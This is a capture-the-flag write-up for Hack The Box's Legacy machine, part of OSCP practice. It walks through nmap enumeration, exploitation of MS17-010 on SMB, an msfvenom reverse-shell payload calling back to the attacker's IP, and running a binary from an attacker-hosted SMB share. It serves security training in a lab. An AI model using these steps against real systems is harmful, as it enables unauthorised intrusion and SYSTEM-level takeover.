Hack The Box — Legacy— without Metasploit (TJNull’s list for OSCP)
This is my 23rd write-up for Legacy, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -T4 -A legacy.htb
So we have port 139, and 445 open. And nmap also detects that the OS could possibly be Windows XP. First thing that comes to my mind is the well known vulnerability ‘Eternal Blue’ AKA ‘MS17–010’. Well, if you don’t know about this vulnerability no need to worry. Nmap can detect it for you if you run the smb-vuln* scripts against the target.
nmap --script smb-vuln* -p139,445 legacy.htb
It tells us that the SMB service that’s running is vulnerable to MS17–10 and MS08–067.
Initial Foothold
Since, we are not using metasploit we will look for an exploit online. And this is what I found.
I simply git cloned it and there are a lot of python scripts there.
I am gonna generate my own windows reverse shell using msfvenom and then use send_and_execute.py to upload, and run it on the target.
I tried, staged reverse shell, but that didn’t work, it just crashes right after getting the connection. So, I am gonna use non-staged shell here.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.32 LPORT=4242 -f exe > shell.exe
Now, let’s start the listener on port 4242 and then run the exploit against the target with this shell.exe that we just generated.
And we got a shell!
The current working directory is C:\Windows\system32, so there’s a very high probability that we got an NT AUTHORITY\SYSTEM (root) shell. But let’s check it anyway.
whoami
The target doesn’t have the whoami.exe. We will transfer that from our attacking machine.
Since, the target doesn’t have wget,netcat,socat,curl, or powershell. We will just run an SMB server on our kali machine and use that.
locate smbserver.py
I am gonna use this python3-impacket SMB server. (You may need to install impacket for this if your impacket is having problems, use this tool to fix it: https://github.com/Dewalt-arch/pimpmykali).
cp /usr/share/doc/python3-impacket/examples/smbserver.py .I just copied that script to my current directory. Now I will locate and copy whoami.exe to my current directory.
locate whoami.exe
cp /usr/share/windows-resources/binaries/whoami.exe .
Now let’s run the smbserver.py and host an SMB share.
python3 smbserver.py DaemonExala /root/TJNull/Windows/Legacy/MS17-010
DaemonExala is the name of the share that I created and /root/TJNull/Windows/Legacy/MS17–010 is the directory that I hosted on that share, containing my whoami.exe file.
Now let’s run the following command on the target to connect to our SMB and run the whoami executable.
\\10.10.16.32\DaemonExala\whoami.exe
And we are in fact, NT AUTHORITY\SYSTEM (root).
No Privilege Escalation required.
EZ :)
